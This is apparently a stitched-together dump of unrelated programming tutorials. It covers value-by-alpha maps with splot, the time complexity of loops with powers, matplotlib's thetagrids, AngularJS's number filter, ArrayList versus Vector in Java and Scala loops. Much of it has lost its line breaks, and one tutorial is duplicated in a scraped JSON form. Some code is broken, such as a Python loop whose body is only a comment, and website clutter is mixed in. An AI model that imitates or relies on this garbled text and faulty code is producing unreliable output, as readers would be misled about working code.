plt.style.use('dark_background')fig, ax = plt.subplots(figsize=(12,10))vba_choropleth( gdf['BARACK OBA'].values, gdf['Total Resu'].values, gdf, rgb_mapclassify=dict(classifier='quantiles'), alpha_mapclassify=dict(classifier='quantiles'), cmap='RdBu', ax=ax, revert_alpha=False )plt.show() Without a legend, value-by-alpha maps are hard to read. Splot provides an easy way to create a legend, far easier than in other heavyweight GIS software applications. We also revert to a white background. plt.style.use('default')fig, ax = plt.subplots(figsize=(12,10))vba_choropleth( gdf['BARACK OBA'].values, gdf['Total Resu'].values, gdf, rgb_mapclassify=dict(classifier='quantiles'), alpha_mapclassify=dict(classifier='quantiles'), cmap='RdBu', ax=ax, revert_alpha=False, legend = True )plt.show() Finally, we can add some context to the map. For example, we can add major cities to help the reader effectively read the map. cities = gpd.read_file("data/ne_10_populated_places.geojson")cities = cities.to_crs("EPSG:26915")fig, ax = plt.subplots(figsize=(12,10))vba_choropleth( gdf['BARACK OBA'].values, gdf['Total Resu'].values, gdf, rgb_mapclassify=dict(classifier='quantiles'), alpha_mapclassify=dict(classifier='quantiles'), cmap='RdBu', ax=ax, revert_alpha=False, legend = True )cities.plot(ax=ax, color = "white")for x, y, label in zip(cities.geometry.x, cities.geometry.y, cities.NAME): ax.annotate(label, xy=(x, y), xytext=(3, 3), textcoords="offset points")plt.show() Now, we have an aesthetically pleasing map that helps us to convey the spotlight effect without the limitations of choropleth maps. Value-by-alpha maps are an effective way to visualize geospatial data, avoiding the limitations of both choropleth and cartogram maps. In this tutorial, we have explored what a value-by-alpha map is and how to create one using the Splot library. The code for this tutorial is available at this Github repository.
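The same alpha-equalizing effect can also be sketched without splot by building per-feature RGBA colours by hand; this assumes the gdf loaded above and a geopandas version that accepts a list-like of colours.

import numpy as np
import matplotlib.pyplot as plt
import matplotlib.colors as mcolors

vals = gdf['BARACK OBA'].to_numpy(dtype=float)   # variable of interest
eq = gdf['Total Resu'].to_numpy(dtype=float)     # equalizing variable

# Map the value column to RdBu colours, then use the equalizer as the alpha channel.
rgba = plt.get_cmap('RdBu')(mcolors.Normalize(vals.min(), vals.max())(vals))
rgba[:, 3] = (eq - eq.min()) / (eq.max() - eq.min())

fig, ax = plt.subplots(figsize=(12, 10))
gdf.plot(color=rgba, ax=ax)   # one RGBA colour per feature
ax.axis('off')
plt.show()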
[ { "code": null, "e": 440, "s": 172, "text": "Ever since I have seen the beautiful aesthetics of Value-By-Alpha maps, I wanted to make one. It was not that hard to make them with a bit of hacking in QGIS or ArcGIS back then. Now, you can make your value-by-alpha map with Python thanks to Pysal library and Splot." }, { "code": null, "e": 627, "s": 440, "text": "In this tutorial, I will guide you on how to make value-by-alpha map using Python. But first, let us understand what value-by-alpha map is, why use it, and when is it appropriate to use?" }, { "code": null, "e": 867, "s": 627, "text": "Value-by-alpha is bivariate choropleth technique where we consider two variables that affect each other say, for example, election results and population density. The second variable acts as an equalizer for the other variable of interest." }, { "code": null, "e": 1112, "s": 867, "text": "VBA modifies therefore through the alpha variable (transparency) the background colour. Thus, lower values fade into the background, while higher values pop up. The VBA maps came into existence to reduce the larger size bias in choropleth maps." }, { "code": null, "e": 1332, "s": 1112, "text": "Besides the aesthetics part, VBA can be a good fit when you want to highlight spotlights through colour instead of size, using choropleth techniques. It does portray much better information than the pure choropleth map." }, { "code": null, "e": 1508, "s": 1332, "text": "However, you first need to have a variable which is consequential to the variable of interest ( I,e. counties with more voters have consequential effects on election results)." }, { "code": null, "e": 1721, "s": 1508, "text": "We will be using the Splot Python library to create our map and Geopandas to read the Geospatial data. We use a subset data of 2012 elections in the USA. Let us first read the data and look at the first few rows." }, { "code": null, "e": 1894, "s": 1721, "text": "import geopandas as gpdfrom splot.mapping import vba_choroplethimport matplotlib.pyplot as plt%matplotlib inlinegdf = gpd.read_file(\"data/MN_elections_2012.gpkg\")gdf.head()" }, { "code": null, "e": 2040, "s": 1894, "text": "As you can see from the table below, we have a Geodataframe with different columns. For example, Barack OBA column holds the results in the area." }, { "code": null, "e": 2311, "s": 2040, "text": "We use choropleth maps most of the time, but as we have mentioned in the preceding section, It has its limitations. Let us first make a choropleth map out of the data to create a benchmark for the data visualization. We can pick, for example, to use Barack Obama column." }, { "code": null, "e": 2444, "s": 2311, "text": "fig, ax = plt.subplots(figsize=(12,10))gdf.plot(column=’BARACK OBA’, scheme=’quantiles’, cmap=’RdBu’, ax=ax)ax.axis(“off”)plt.show()" }, { "code": null, "e": 2869, "s": 2444, "text": "Now, we create a value-by-alpha map. To create our map, we need two columns. The first column is what we are interested in displaying in the map; for example, Barack Obama results. The second column holds the alpha values to equalize. This alpha equalization will eliminate low values from the map appearance and increases the spotlight effects in areas with high values. We can choose the total results as the alpha values." 
}, { "code": null, "e": 3162, "s": 2869, "text": "fig, ax = plt.subplots(figsize=(12,10))vba_choropleth( gdf[‘BARACK OBA’].values, gdf[‘Total Resu’].values, gdf, rgb_mapclassify=dict(classifier=’quantiles’), alpha_mapclassify=dict(classifier=’quantiles’), cmap=’RdBu’, ax=ax, revert_alpha=False )plt.show()" }, { "code": null, "e": 3384, "s": 3162, "text": "The value by alpha map highlights the high-value areas immediately, even if they are n. Compared to the choropleth map, which the large areas dominate the visual, the value-by-alpha map shows clearly the high-value areas." }, { "code": null, "e": 3521, "s": 3384, "text": "We can simply use a black background to emphasize the spotlight effect as well. Compare the below value-by-alpha map with the one above." }, { "code": null, "e": 3846, "s": 3521, "text": "plt.style.use('dark_background')fig, ax = plt.subplots(figsize=(12,10))vba_choropleth( gdf[‘BARACK OBA’].values, gdf[‘Total Resu’].values, gdf, rgb_mapclassify=dict(classifier=’quantiles’), alpha_mapclassify=dict(classifier=’quantiles’), cmap=’RdBu’, ax=ax, revert_alpha=False )plt.show()" }, { "code": null, "e": 4062, "s": 3846, "text": "Without a legend, the value-by-alpha maps are hard to read. Splot provides an easy way to create a Legend, way easier than even other heavyweight GIS software applications. We also revert back to a white background." }, { "code": null, "e": 4398, "s": 4062, "text": "plt.style.use('default')fig, ax = plt.subplots(figsize=(12,10))vba_choropleth( gdf[‘BARACK OBA’].values, gdf[‘Total Resu’].values, gdf, rgb_mapclassify=dict(classifier=’quantiles’), alpha_mapclassify=dict(classifier=’quantiles’), cmap=’RdBu’, ax=ax, revert_alpha=False, legend = True )plt.show()" }, { "code": null, "e": 4525, "s": 4398, "text": "Finally, we can add some context to the map. For example, we can add major cities to help the reader effectively read the map." }, { "code": null, "e": 5119, "s": 4525, "text": "cities = gpd.read_file(“data/ne_10_populated_places.geojson”)cities = cities.to_crs(“EPSG:26915”)fig, ax = plt.subplots(figsize=(12,10))vba_choropleth( gdf[‘BARACK OBA’].values, gdf[‘Total Resu’].values, gdf, rgb_mapclassify=dict(classifier=’quantiles’), alpha_mapclassify=dict(classifier=’quantiles’), cmap=’RdBu’, ax=ax, revert_alpha=False, legend = True )cities.plot(ax=ax, color = \"white\")for x, y, label in zip(cities.geometry.x, cities.geometry.y, cities.NAME): ax.annotate(label, xy=(x, y), xytext=(3, 3), textcoords=\"offset points\")plt.show()" }, { "code": null, "e": 5251, "s": 5119, "text": "Now, we have an aesthetically pleasing map that helps us to convey the spotlight effect without the limitations of choropleth maps." }, { "code": null, "e": 5495, "s": 5251, "text": "Value-by-alpha maps are an effective way to visualize geospatial data, avoiding the limitations of both choropleth and cartogram maps. In this tutorial, we have explored what value-by-alpha map is and how to create one using the Splot library." } ]
Time Complexity of Loop with Powers - GeeksforGeeks
30 Dec, 2021 What is the time complexity of the below function? C++ C Java Python3 C# Javascript void fun(int n, int k){ for (int i = 1; i <= n; i++) { int p = pow(i, k); for (int j = 1; j <= p; j++) { // Some O(1) work } }} // This code is contributed by Shubham Singh void fun(int n, int k){ for (int i = 1; i <= n; i++) { int p = pow(i, k); for (int j = 1; j <= p; j++) { // Some O(1) work } }} static void fun(int n, int k){ for (int i = 1; i <= n; i++) { int p = (int) Math.pow(i, k); for (int j = 1; j <= p; j++) { // Some O(1) work } }} // This code is contributed by umadevi9616 def fun(n, k): for i in range(1, n + 1): p = pow(i, k) for j in range(1, p + 1): # Some O(1) work # This code is contributed by Shubham Singh static void fun(int n, int k){ for (int i = 1; i <= n; i++) { int p = (int) Math.Pow(i, k); for (int j = 1; j <= p; j++) { // Some O(1) work } }} // This code is contributed by umadevi9616 <script> // JavaScript program for the above approachfunction fun(n, k){ for(let i = 1; i <= n; i++) { let p = Math.pow(i, k); for (let j = 1; j <= p; j++) { // Some O(1) work } }} // This code is contributed by Shubham Singh </script> The time complexity of the above function can be written as 1^k + 2^k + 3^k + ... + n^k. Let us try a few examples: k=1 Sum = 1 + 2 + 3 + ... + n = n(n+1)/2 = n^2/2 + n/2 k=2 Sum = 1^2 + 2^2 + 3^2 + ... + n^2 = n(n+1)(2n+1)/6 = n^3/3 + n^2/2 + n/6 k=3 Sum = 1^3 + 2^3 + 3^3 + ... + n^3 = n^2(n+1)^2/4 = n^4/4 + n^3/2 + n^2/4 In general, the asymptotic value can be written as n^(k+1)/(k+1) + Θ(n^k). If n >= k then the time complexity will be considered as O(n^(k+1)/(k+1)), and if n < k, then the time complexity will be considered as O(n^k). Please write comments if you find anything incorrect, or you want to share more information about the topic discussed above biplab_prasad rohitnandi01234 umadevi9616 SHUBHAMSINGH10 time complexity Analysis Articles Writing code in comment? Please use ide.geeksforgeeks.org, generate link and share the link here. Understanding Time Complexity with Simple Examples Time Complexity and Space Complexity Complexity of different operations in Binary tree, Binary Search Tree and AVL tree Analysis of Algorithms | Big-O analysis Analysis of different sorting techniques Tree Traversals (Inorder, Preorder and Postorder) SQL | Join (Inner, Left, Right and Full Joins) find command in Linux with examples SQL Interview Questions How to write a Pseudo Code?
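A quick empirical check of that closed form in plain Python (nothing assumed beyond the analysis above): the ratio of the sum to n^(k+1)/(k+1) approaches 1 as n grows.

def power_sum(n, k):
    # 1^k + 2^k + ... + n^k, computed directly.
    return sum(i ** k for i in range(1, n + 1))

for k in (1, 2, 3):
    n = 1000
    print(k, power_sum(n, k) / (n ** (k + 1) / (k + 1)))  # each ratio is close to 1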
[ { "code": null, "e": 25679, "s": 25651, "text": "\n30 Dec, 2021" }, { "code": null, "e": 25730, "s": 25679, "text": "What is the time complexity of the below function?" }, { "code": null, "e": 25734, "s": 25730, "text": "C++" }, { "code": null, "e": 25736, "s": 25734, "text": "C" }, { "code": null, "e": 25741, "s": 25736, "text": "Java" }, { "code": null, "e": 25749, "s": 25741, "text": "Python3" }, { "code": null, "e": 25752, "s": 25749, "text": "C#" }, { "code": null, "e": 25763, "s": 25752, "text": "Javascript" }, { "code": "void fun(int n, int k){ for (int i = 1; i <= n; i++) { int p = pow(i, k); for (int j = 1; j <= p; j++) { // Some O(1) work } }} // This code is contributed by Shubham Singh", "e": 25984, "s": 25763, "text": null }, { "code": "void fun(int n, int k){ for (int i = 1; i <= n; i++) { int p = pow(i, k); for (int j = 1; j <= p; j++) { // Some O(1) work } }}", "e": 26160, "s": 25984, "text": null }, { "code": "static void fun(int n, int k){ for (int i = 1; i <= n; i++) { int p = Math.pow(i, k); for (int j = 1; j <= p; j++) { // Some O(1) work } }} // This code is contributed by umadevi9616", "e": 26391, "s": 26160, "text": null }, { "code": "def fun(n, k): for i in range(1, n + 1): p = pow(i, k) for j in range(1, p + 1): # Some O(1) work # This code is contributed by Shubham Singh", "e": 26575, "s": 26391, "text": null }, { "code": "static void fun(int n, int k){ for (int i = 1; i <= n; i++) { int p = Math.Pow(i, k); for (int j = 1; j <= p; j++) { // Some O(1) work } }} // This code is contributed by umadevi9616", "e": 26806, "s": 26575, "text": null }, { "code": "<script> // JavaScript program for the above approachfunction fun(n, k){ for(let i = 1; i <= n; i++) { int p = Math.pow(i, k); for (let j = 1; j <= p; j++) { // Some O(1) work } }} // This code is contributed by Shubham Singh </script>", "e": 27090, "s": 26806, "text": null }, { "code": null, "e": 27166, "s": 27090, "text": "Time complexity of above function can be written as 1k + 2k + 3k + ... n1k." }, { "code": null, "e": 27192, "s": 27166, "text": "Let us try few examples: " }, { "code": null, "e": 27414, "s": 27192, "text": "k=1\nSum = 1 + 2 + 3 ... n \n = n(n+1)/2 \n = n2/2 + n/2\n\nk=2\nSum = 12 + 22 + 32 + ... n12.\n = n(n+1)(2n+1)/6\n = n3/3 + n2/2 + n/6\n\nk=3\nSum = 13 + 23 + 33 + ... n13.\n = n2(n+1)2/4\n = n4/4 + n3/2 + n2/4 " }, { "code": null, "e": 27626, "s": 27414, "text": "In general, asymptotic value can be written as (nk+1)/(k+1) + Θ(nk)If n>=k then the time complexity will be considered in O((nk+1)/(k+1)) and if n<k, then the time complexity will be considered as in the O(nk)" }, { "code": null, "e": 27750, "s": 27626, "text": "Please write comments if you find anything incorrect, or you want to share more information about the topic discussed above" }, { "code": null, "e": 27764, "s": 27750, "text": "biplab_prasad" }, { "code": null, "e": 27780, "s": 27764, "text": "rohitnandi01234" }, { "code": null, "e": 27792, "s": 27780, "text": "umadevi9616" }, { "code": null, "e": 27807, "s": 27792, "text": "SHUBHAMSINGH10" }, { "code": null, "e": 27823, "s": 27807, "text": "time complexity" }, { "code": null, "e": 27832, "s": 27823, "text": "Analysis" }, { "code": null, "e": 27841, "s": 27832, "text": "Articles" }, { "code": null, "e": 27939, "s": 27841, "text": "Writing code in comment?\nPlease use ide.geeksforgeeks.org,\ngenerate link and share the link here." 
}, { "code": null, "e": 27990, "s": 27939, "text": "Understanding Time Complexity with Simple Examples" }, { "code": null, "e": 28027, "s": 27990, "text": "Time Complexity and Space Complexity" }, { "code": null, "e": 28110, "s": 28027, "text": "Complexity of different operations in Binary tree, Binary Search Tree and AVL tree" }, { "code": null, "e": 28150, "s": 28110, "text": "Analysis of Algorithms | Big-O analysis" }, { "code": null, "e": 28191, "s": 28150, "text": "Analysis of different sorting techniques" }, { "code": null, "e": 28241, "s": 28191, "text": "Tree Traversals (Inorder, Preorder and Postorder)" }, { "code": null, "e": 28288, "s": 28241, "text": "SQL | Join (Inner, Left, Right and Full Joins)" }, { "code": null, "e": 28324, "s": 28288, "text": "find command in Linux with examples" }, { "code": null, "e": 28348, "s": 28324, "text": "SQL Interview Questions" } ]
Matplotlib.pyplot.thetagrids() in Python - GeeksforGeeks
29 Jul, 2021

Matplotlib is a plotting library for the Python programming language, and its numerical mathematics module is NumPy. matplotlib.pyplot is a collection of command-style functions that make matplotlib work like the MATLAB tool. Each of the pyplot functions makes certain changes to a figure: e.g., it creates a figure, creates a plot area in a figure, plots some lines in a plotting area, or decorates the plot with labels.

Note: For more information, refer to Pyplot in Matplotlib

thetagrids() sets the theta locations of the gridlines in a polar plot. If no arguments are passed, it returns a tuple (lines, labels), where lines is an array of radial gridlines (Line2D instances) and labels is an array of tick labels (Text instances).

Syntax: lines, labels = thetagrids(angles, labels=None, fmt='%d', frac=1.5)

Parameters:

angles: the angles at which to place the theta gridlines (the gridlines are equally spaced along the theta dimension).

labels: if not None, a list of len(angles) strings giving the labels to use at each angle. If labels is None, the labels will be fmt%angle.

frac: the fraction of the polar axes radius at which to place the label (1 is the edge), e.g., 1.25 is outside the axes and 0.75 is inside the axes.

Return Type: a tuple (lines, labels). Note: lines are Line2D instances, labels are Text instances.

Example:

Python3

import matplotlib.pyplot as plt
import numpy as np

employee = ["Rahul", "Joy", "Abhishek", "Tina", "Sneha"]

actual = [41, 57, 59, 63, 52, 41]
expected = [40, 59, 58, 64, 55, 40]

# Initializing the spider plot by
# setting figure size and polar
# projection
plt.figure(figsize =(10, 6))
plt.subplot(polar = True)

theta = np.linspace(0, 2 * np.pi, len(actual))

# Arranging the grid into number
# of sales into equal parts in
# degrees
lines, labels = plt.thetagrids(range(0, 360, int(360/len(employee))),
                               (employee))

# Plot actual sales graph
plt.plot(theta, actual)
plt.fill(theta, actual, 'b', alpha = 0.1)

# Plot expected sales graph
plt.plot(theta, expected)

# Add legend and title for the plot
plt.legend(labels =('Actual', 'Expected'), loc = 1)
plt.title("Actual vs Expected sales by Employee")

# Display the plot on the screen
plt.show()

Output:
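Since thetagrids() returns the gridline and label artists, they can also be styled after the fact. A minimal sketch of this (standard matplotlib API only; not from the original article):

import matplotlib.pyplot as plt

plt.figure(figsize=(6, 6))
plt.subplot(polar=True)

# Place theta gridlines every 45 degrees and capture the returned artists
lines, labels = plt.thetagrids(range(0, 360, 45))

# labels are Text instances, so they can be styled individually
for label in labels:
    label.set_color("darkblue")
    label.set_fontsize(12)

plt.show()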
[ { "code": null, "e": 25647, "s": 25619, "text": "\n29 Jul, 2021" }, { "code": null, "e": 26123, "s": 25647, "text": "Matplotlib is a plotting library of Python programming language and its numerical mathematics module is NumPy. matplotlib.pyplot is a collection of command style functions that make matplotlib work like the MATLAB Tool. Each of the pyplot functions makes certain changes to a figure: e.g., creating a figure, creating a plot area in a figure, plots some lines in a plotting area or decorate the plot with labels, etc.Note: For more information, refer to Pyplot in Matplotlib " }, { "code": null, "e": 26368, "s": 26125, "text": "Set the theta locations of the gridlines in the polar plot. If no arguments are passed, it returns a tuple (lines, labels) where lines are an array of radial gridlines (Line2D instances) and labels is an array of tick labels (Text instances):" }, { "code": null, "e": 26459, "s": 26370, "text": "Syntax: lines, labels = thetagrids(angles, labels=None, fmt=’%d’, frac = 1.5)Parameters:" }, { "code": null, "e": 26467, "s": 26459, "text": "Angles:" }, { "code": null, "e": 26564, "s": 26467, "text": "set the angles to the place of theta grids (these gridlines are equal along the theta dimension)" }, { "code": null, "e": 26572, "s": 26564, "text": "labels:" }, { "code": null, "e": 26714, "s": 26572, "text": "if not None, then it is len(angles) or list of strings of the labels to use at each angle. If labels are None, the labels will be fmt%angle. " }, { "code": null, "e": 26986, "s": 26714, "text": "frac: It is the fraction of the polar axes radius at the place of label (1 is the edge). e.g., 1.25 is outside the axes and 0.75 is inside the axes. Return Type: Return value is a list of tuples (lines, labels)Note: lines are Line2D instances, labels are Text instances." }, { "code": null, "e": 27108, "s": 26986, "text": "Return Type: Return value is a list of tuples (lines, labels)Note: lines are Line2D instances, labels are Text instances." }, { "code": null, "e": 27118, "s": 27108, "text": "Example: " }, { "code": null, "e": 27126, "s": 27118, "text": "Python3" }, { "code": "import matplotlib.pyplot as pltimport numpy as np employee = [\"Rahul\", \"Joy\", \"Abhishek\", \"Tina\", \"Sneha\"] actual = [41, 57, 59, 63, 52, 41]expected = [40, 59, 58, 64, 55, 40] # Initialing the spiderplot by # setting figure size and polar# projectionplt.figure(figsize =(10, 6))plt.subplot(polar = True) theta = np.linspace(0, 2 * np.pi, len(actual)) # Arranging the grid into number # of sales into equal parts in# degreeslines, labels = plt.thetagrids(range(0, 360, int(360/len(employee))), (employee)) # Plot actual sales graphplt.plot(theta, actual)plt.fill(theta, actual, 'b', alpha = 0.1) # Plot expected sales graphplt.plot(theta, expected) # Add legend and title for the plotplt.legend(labels =('Actual', 'Expected'), loc = 1)plt.title(\"Actual vs Expected sales by Employee\") # Display the plot on the screenplt.show()", "e": 28055, "s": 27126, "text": null }, { "code": null, "e": 28064, "s": 28055, "text": "Output: " }, { "code": null, "e": 28079, "s": 28066, "text": "singghakshay" }, { "code": null, "e": 28097, "s": 28079, "text": "Python-matplotlib" }, { "code": null, "e": 28104, "s": 28097, "text": "Python" }, { "code": null, "e": 28202, "s": 28104, "text": "Writing code in comment?\nPlease use ide.geeksforgeeks.org,\ngenerate link and share the link here." }, { "code": null, "e": 28234, "s": 28202, "text": "How to Install PIP on Windows ?" 
}, { "code": null, "e": 28276, "s": 28234, "text": "Check if element exists in list in Python" }, { "code": null, "e": 28318, "s": 28276, "text": "How To Convert Python Dictionary To JSON?" }, { "code": null, "e": 28374, "s": 28318, "text": "How to drop one or multiple columns in Pandas Dataframe" }, { "code": null, "e": 28401, "s": 28374, "text": "Python Classes and Objects" }, { "code": null, "e": 28432, "s": 28401, "text": "Python | os.path.join() method" }, { "code": null, "e": 28468, "s": 28432, "text": "Python | Pandas dataframe.groupby()" }, { "code": null, "e": 28497, "s": 28468, "text": "Create a directory in Python" }, { "code": null, "e": 28519, "s": 28497, "text": "Defaultdict in Python" } ]
AngularJS | number Filter - GeeksforGeeks
07 May, 2019

The AngularJS number filter is used to convert a number into a string or text. We can also define a limit on the number of decimal digits to display. The number filter rounds off the number to the specified number of decimal digits.

Syntax:

{{ string | number : fractionSize }}

Parameter Values: It takes a single parameter, fractionSize, which is of type number and is used to specify the number of decimals.

Example 1: This example formats the number to a fraction with two decimal places.

<!DOCTYPE html>
<html>
    <head>
        <title>Number Filter</title>
        <script src="https://ajax.googleapis.com/ajax/libs/angularjs/1.6.9/angular.min.js">
        </script>
    </head>
    <body>
        <div ng-app="gfgApp" ng-controller="numberCntrl">
            <h3>Number filter with fraction size.</h3>
            <p>Number : {{ value | number : 2 }}</p>
        </div>
        <script>
            var app = angular.module('gfgApp', []);
            app.controller('numberCntrl', function($scope) {
                $scope.value = 75598.548;
            });
        </script>
    </body>
</html>

Output:

Example 2: This example formats the number without specifying a fraction size, so the default formatting is applied.

<!DOCTYPE html>
<html>
    <head>
        <title>Number Filter</title>
        <script src="https://ajax.googleapis.com/ajax/libs/angularjs/1.6.9/angular.min.js">
        </script>
    </head>
    <body>
        <div ng-app="gfgApp" ng-controller="numberCntrl">
            <h3>Number filter without fraction size.</h3>
            <p>Number : {{ value | number }}</p>
        </div>
        <script>
            var app = angular.module('gfgApp', []);
            app.controller('numberCntrl', function($scope) {
                $scope.value = 524598.54812;
            });
        </script>
    </body>
</html>

Output:
[ { "code": null, "e": 29516, "s": 29488, "text": "\n07 May, 2019" }, { "code": null, "e": 29720, "s": 29516, "text": "AngularJS number filter is used to convert a number into string or text. We can also define a limit to display a number of decimal digits. Number filter rounds off the number to specified decimal digits." }, { "code": null, "e": 29728, "s": 29720, "text": "Syntax:" }, { "code": null, "e": 29764, "s": 29728, "text": "{{ string| number : fractionSize}}\n" }, { "code": null, "e": 29898, "s": 29764, "text": "Parameter Values: It contains single parameter value fractionsize which is of type number and used to specify the number of decimals." }, { "code": null, "e": 29993, "s": 29898, "text": "Example 1: This example format the number and set it into the fraction with two decimal place." }, { "code": "<!DOCTYPE html><html> <head> <title>Number Filter</title> <script src=\"https://ajax.googleapis.com/ajax/libs/angularjs/1.6.9/angular.min.js\"> </script> </head> <body> <div ng-app=\"gfgApp\" ng-controller=\"numberCntrl\"> <h3>Number filter with fraction size.</h3> <p>Number : {{ value| number : 2}}</p> </div> <script> var app = angular.module('gfgApp', []); app.controller('numberCntrl', function($scope) { $scope.value = 75598.548; }); </script> </body></html>", "e": 30609, "s": 29993, "text": null }, { "code": null, "e": 30617, "s": 30609, "text": "Output:" }, { "code": null, "e": 30714, "s": 30617, "text": "Example 2: This example format the number and set it into the fraction with three decimal place." }, { "code": "<!DOCTYPE html><html> <head> <title>Number Filter</title> <script src=\"https://ajax.googleapis.com/ajax/libs/angularjs/1.6.9/angular.min.js\"> </script> </head> <body> <div ng-app=\"gfgApp\" ng-controller=\"numberCntrl\"> <h3>Number filter without fraction size.</h3> <p>Number : {{ value| number}}</p> </div> <script> var app = angular.module('gfgApp', []); app.controller('numberCntrl', function($scope) { $scope.value = 524598.54812; }); </script> </body></html>", "e": 31331, "s": 30714, "text": null }, { "code": null, "e": 31339, "s": 31331, "text": "Output:" }, { "code": null, "e": 31346, "s": 31339, "text": "Picked" }, { "code": null, "e": 31356, "s": 31346, "text": "AngularJS" }, { "code": null, "e": 31373, "s": 31356, "text": "Web Technologies" }, { "code": null, "e": 31471, "s": 31373, "text": "Writing code in comment?\nPlease use ide.geeksforgeeks.org,\ngenerate link and share the link here." }, { "code": null, "e": 31491, "s": 31471, "text": "Angular File Upload" }, { "code": null, "e": 31526, "s": 31491, "text": "Angular PrimeNG Dropdown Component" }, { "code": null, "e": 31548, "s": 31526, "text": "Angular | keyup event" }, { "code": null, "e": 31579, "s": 31548, "text": "Auth Guards in Angular 9/10/11" }, { "code": null, "e": 31667, "s": 31579, "text": "How to Display Spinner on the Screen till the data from the API loads using Angular 8 ?" }, { "code": null, "e": 31707, "s": 31667, "text": "Remove elements from a JavaScript Array" }, { "code": null, "e": 31740, "s": 31707, "text": "Installation of Node.js on Linux" }, { "code": null, "e": 31785, "s": 31740, "text": "Convert a string to an integer in JavaScript" }, { "code": null, "e": 31828, "s": 31785, "text": "How to fetch data from an API in ReactJS ?" } ]
Difference Between ArrayList and Vector in Java
In this post, we will understand the difference between ArrayList and Vector in Java.

ArrayList

It is not synchronized, and hence not thread-safe.
If the number of elements exceeds the capacity of the ArrayList, it increments the current array size by 50 percent.
It was introduced in JDK 1.2.
It can only use an iterator to traverse, i.e., it uses the Iterator interface to traverse through the elements.
Since it is non-synchronized, it is quick.

ArrayList<T> al = new ArrayList<T>();

Vector

It is synchronized, and hence thread-safe.
It is a legacy class.
It is slow, since it is synchronized.
If the number of elements exceeds the capacity of the Vector, it increments the current array size by 100 percent.
It is preferred over ArrayList when a multi-threading environment is required.
It holds other threads in the runnable or non-runnable state until the current thread releases the lock on the specific object.
It can use either the Iterator interface or the Enumeration interface to traverse through the elements.

Vector<T> v = new Vector<T>();
[ { "code": null, "e": 1148, "s": 1062, "text": "In this post, we will understand the difference between ArrayList and Vector in Java." }, { "code": null, "e": 1172, "s": 1148, "text": "It is not synchronized." }, { "code": null, "e": 1196, "s": 1172, "text": "It is not synchronized." }, { "code": null, "e": 1313, "s": 1196, "text": "If the number of elements exceeds the capacity of the ArrayList, it increments the current array size by 50 percent." }, { "code": null, "e": 1430, "s": 1313, "text": "If the number of elements exceeds the capacity of the ArrayList, it increments the current array size by 50 percent." }, { "code": null, "e": 1453, "s": 1430, "text": "It is not thread-safe." }, { "code": null, "e": 1476, "s": 1453, "text": "It is not thread-safe." }, { "code": null, "e": 1506, "s": 1476, "text": "It was introduced in JDK 1.2." }, { "code": null, "e": 1536, "s": 1506, "text": "It was introduced in JDK 1.2." }, { "code": null, "e": 1574, "s": 1536, "text": "it can only use iterator to traverse." }, { "code": null, "e": 1612, "s": 1574, "text": "it can only use iterator to traverse." }, { "code": null, "e": 1655, "s": 1612, "text": "Since it is non-synchronized, it is quick." }, { "code": null, "e": 1698, "s": 1655, "text": "Since it is non-synchronized, it is quick." }, { "code": null, "e": 1763, "s": 1698, "text": "It uses the Iterator interface to traverse through the elements." }, { "code": null, "e": 1828, "s": 1763, "text": "It uses the Iterator interface to traverse through the elements." }, { "code": null, "e": 1866, "s": 1828, "text": "ArrayList<T> al = new ArrayList<T>();" }, { "code": null, "e": 1886, "s": 1866, "text": "It is synchronized." }, { "code": null, "e": 1906, "s": 1886, "text": "It is synchronized." }, { "code": null, "e": 1925, "s": 1906, "text": "It is thread safe." }, { "code": null, "e": 1944, "s": 1925, "text": "It is thread safe." }, { "code": null, "e": 1966, "s": 1944, "text": "It is a legacy class." }, { "code": null, "e": 1988, "s": 1966, "text": "It is a legacy class." }, { "code": null, "e": 2026, "s": 1988, "text": "It is slow, since it is synchronized." }, { "code": null, "e": 2064, "s": 2026, "text": "It is slow, since it is synchronized." }, { "code": null, "e": 2179, "s": 2064, "text": "If the number of elements exceeds the capacity of the Vector, it increments the current array size by 100 percent." }, { "code": null, "e": 2294, "s": 2179, "text": "If the number of elements exceeds the capacity of the Vector, it increments the current array size by 100 percent." }, { "code": null, "e": 2342, "s": 2294, "text": "It can use enumerator and iterator to traverse." }, { "code": null, "e": 2390, "s": 2342, "text": "It can use enumerator and iterator to traverse." }, { "code": null, "e": 2422, "s": 2390, "text": "It is preferred over ArrayList." }, { "code": null, "e": 2454, "s": 2422, "text": "It is preferred over ArrayList." }, { "code": null, "e": 2497, "s": 2454, "text": "It provides a multi-threading environment." }, { "code": null, "e": 2540, "s": 2497, "text": "It provides a multi-threading environment." }, { "code": null, "e": 2669, "s": 2540, "text": "It holds other threads in the runnable or non-runnable state, until the current thread releases the lock on the specific object." }, { "code": null, "e": 2798, "s": 2669, "text": "It holds other threads in the runnable or non-runnable state, until the current thread releases the lock on the specific object." 
}, { "code": null, "e": 2904, "s": 2798, "text": "It can use either the ‘Iterator’ interface or the Enumeration interface to traverse through the elements." }, { "code": null, "e": 3010, "s": 2904, "text": "It can use either the ‘Iterator’ interface or the Enumeration interface to traverse through the elements." }, { "code": null, "e": 3041, "s": 3010, "text": "Vector<T> v = new Vector<T>();" } ]
Scala - Loop Statements
This chapter takes you through the loop control structures in the Scala programming language.

There may be a situation when you need to execute a block of code several times. In general, statements are executed sequentially: the first statement in a function is executed first, followed by the second, and so on. Programming languages provide various control structures that allow for more complicated execution paths.

A loop statement allows us to execute a statement or group of statements multiple times. Scala provides the following types of loops to handle looping requirements. Click the following links in the table to check their detail.

while loop: Repeats a statement or group of statements while a given condition is true. It tests the condition before executing the loop body.

do-while loop: Like a while statement, except that it tests the condition at the end of the loop body.

for loop: Executes a sequence of statements multiple times and abbreviates the code that manages the loop variable.

Loop control statements change execution from its normal sequence. Scala does not support the break or continue statement like Java does, but starting from Scala version 2.8, there is a way to break out of loops. Click the following link to check the detail.

break statement: Terminates the loop statement and transfers execution to the statement immediately following the loop.

A loop becomes an infinite loop if a condition never becomes false. If you are using Scala, the while loop is the best way to implement an infinite loop. The following program implements an infinite loop.

object Demo {
   def main(args: Array[String]) {
      var a = 10;

      // An infinite loop.
      while( true ){
         println( "Value of a: " + a );
      }
   }
}

Save the above program in Demo.scala. The following commands are used to compile and execute this program.

\>scalac Demo.scala
\>scala Demo

If you execute the above code, it will go into an infinite loop, which you can terminate by pressing the Ctrl + C keys.

Value of a: 10
Value of a: 10
Value of a: 10
Value of a: 10
................
